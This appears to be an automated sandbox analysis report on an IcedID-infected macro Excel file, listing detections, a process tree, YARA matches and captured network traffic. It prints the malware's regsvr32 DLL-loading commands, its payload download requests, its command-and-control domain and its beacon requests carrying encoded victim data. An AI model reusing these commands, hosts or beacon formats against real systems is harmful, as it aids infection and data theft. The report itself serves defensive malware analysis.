Windows Analysis Report sbf0127365-7431059.xlsm

Overview

General Information

Sample Name: sbf0127365-7431059.xlsm
Analysis ID: 444703
MD5: 184ff7a1642ad86b81cc2067f92cfa9d
SHA1: 6362f03ec8cdf762058724459668c9460c692b9c
SHA256: 159596a25327a7ca8531fa0d326c3d80fac14b3732a6ec33e2ba5339fdbce9df
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1228 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2996 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3068 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

    Memory Dumps

    Source | Rule | Description | Author | Strings
    00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
      00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

        Unpacked PEs

        Source | Rule | Description | Author | Strings
        6.2.regsvr32.exe.a0000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        3.2.regsvr32.exe.110000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        3.2.regsvr32.exe.220000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com
        6.2.regsvr32.exe.a0000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        6.2.regsvr32.exe.1b0000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com

        Sigma Overview

        System Summary:

        Sigma detected: Microsoft Office Product Spawning Windows Shell
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1228, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2808

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: 6.2.regsvr32.exe.a0000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedID
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

        Software Vulnerabilities:

        Document exploit detected (creates forbidden files)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dll
        Document exploit detected (drops PE files)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.dr
        Document exploit detected (UrlDownloadToFile)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:15 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5885Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NQa%2FToNAe4OfSycDITeTcPRjCr99aolaLqyUrPFMG%2FPw1ZIxGpsbT0mJx%2FvTchvs%2BxnkydQR5YNN1ucst5YESuFDECWoL7Oed1NuA59e7643MxlLh0PYHC8Rt9YvlJfrDvHmcm4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a2ea894e3d-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:15 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5884Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Br5qITmK7KR5WQ%2BEK2GUF2OhhE7oHZy%2BBwGeVnakesJB4CD5KzwejZeo0P7vlpLpiZAX1mffAGTgFj1rIfVTNTMySqnj%2FLTQ8o21f3gYa3WSAFzGyLaJ9qmj9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a45e4a4a92-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:34:16 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5884Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tdPcIrAE2vvRZYKG1Z8MC4h5F2uk1HO2YqdWJntIaNZoAwTqS6xEVG4oGGJckRbzpb9ReFxkZ%2F6BeyScK5hi57sdBxfviydzcXbmfgwcCsJ5BcBTSQ9zc0B04Gc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935a5daf92c2a-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5201:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:31303745413343414446434341313538; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5205:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:44384136334637384333384532304645; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5209:47; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:32324339344139363335433034463745; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBE85F.png
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net 
https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net 
https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknown DNS traffic detected: queries for: thousandsyears.download
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 06 Jul 2021 13:34:19 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: keep-alive
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0ys7aYdAOjPlkJGrObNQ2tiQGLMnmitDVcOVn5a040LrNhwCvTf3xr2iKIXbxukcjSBigbt3O5XMd7BfJvv2cNF6mg2WXaP2PByGtiV8voZj8c0%2FeqFYxeWaum3sBcuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 66a935ba7ccc4a61-FRA
            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp String found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp String found in binary or memory: http://astrocycle.download/Q5ZDkxZT
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
